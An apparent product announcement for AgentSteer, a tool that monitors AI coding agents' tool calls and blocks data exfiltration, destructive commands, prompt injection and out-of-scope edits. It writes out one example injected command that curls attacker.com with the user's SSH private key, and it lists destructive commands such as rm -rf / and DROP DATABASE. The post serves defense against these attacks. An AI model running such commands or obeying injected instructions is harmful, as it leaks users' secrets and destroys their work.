Introducing AgentSteer: Runtime Guardrails for AI Coding Agents

AI coding agents like Claude Code, Cursor, and Gemini CLI are transforming how developers write software. They scaffold entire projects, fix bugs, and refactor codebases in minutes. But with that autonomy comes real risk: every tool call is a chance for something to go wrong.

AgentSteer is a runtime security layer that monitors every tool call your AI agent makes and blocks dangerous actions before they execute. It works with your existing agent, requires no config, and installs in one command.

The Problem: Tool Calls Are Attack Surfaces

When an AI agent runs bash, write_file, or curl, it has the same permissions you do. That means a single bad tool call can:

• Exfiltrate your code and secrets through network requests, encoded payloads, or file writes to external locations

• Execute destructive commands like rm -rf /, git push --force, or DROP DATABASE that wipe out your work

• Fall victim to prompt injection where malicious instructions hidden in code comments, READMEs, or fetched URLs hijack the agent's behavior

• Drift outside its assigned scope, modifying files, installing packages, or accessing systems it was never asked to touch

These are not hypothetical risks. Research from our evaluations shows that current AI agents are vulnerable to all of these attack vectors, and they happen silently without runtime monitoring.

How AgentSteer Works

AgentSteer hooks directly into your AI coding agent's tool-use pipeline. Before any tool call executes, AgentSteer intercepts it and evaluates it against four security policies:

1. Data Exfiltration Prevention

Blocks attempts to leak source code, environment variables, or secrets through curl, wget, encoded base64 channels, or file writes to locations outside your project.

2. Dangerous Command Blocking

Catches destructive operations before they run. This includes commands like rm -rf, git push --force, chmod 777, database drops, and privilege escalation attempts.

3. Prompt Injection Detection

Identifies when agent behavior deviates from your intent due to injected instructions. If a fetched webpage or code comment tries to make your agent run curl attacker.com/steal?data=$(cat ~/.ssh/id_rsa), AgentSteer catches it.

4. Scope Enforcement

Ensures the agent stays within the boundaries of the task you gave it. If you asked it to fix a CSS bug and it starts modifying your database migration files, AgentSteer flags it.

When a tool call is blocked, AgentSteer returns a clear explanation to the agent so it can self-correct and find a safe alternative.

Getting Started

Set up AgentSteer with a single command:

npx agentsteer quickstart

That's it. This command detects which AI coding agents you have installed, configures the hooks, and starts protecting your sessions immediately. No API keys, no config files, no setup wizard.

What It Supports

• Claude Code — hooks into the PreToolUse event pipeline

• Cursor — monitors tool calls through the extension API

• Gemini CLI — intercepts tool-use requests before execution

• OpenHands — wraps the action execution layer

After installing, run your agent as you normally would. AgentSteer works in the background, only intervening when it detects a genuinely risky action. You can view blocked actions and security scores on the AgentSteer dashboard.

Free and Open Source

AgentSteer is completely free and open source. The full codebase, including the eval framework we use to test against real attack scenarios, is available on GitHub. We believe security tooling for AI agents should be transparent and community-driven.

Read the documentation to learn how policies work, how to customize them, and how to contribute. If you run into issues or want to request a feature, open an issue on GitHub.

Start protecting your AI agent sessions today:

npx agentsteer quickstart

Read the docs · View on GitHub · Visit agentsteer.ai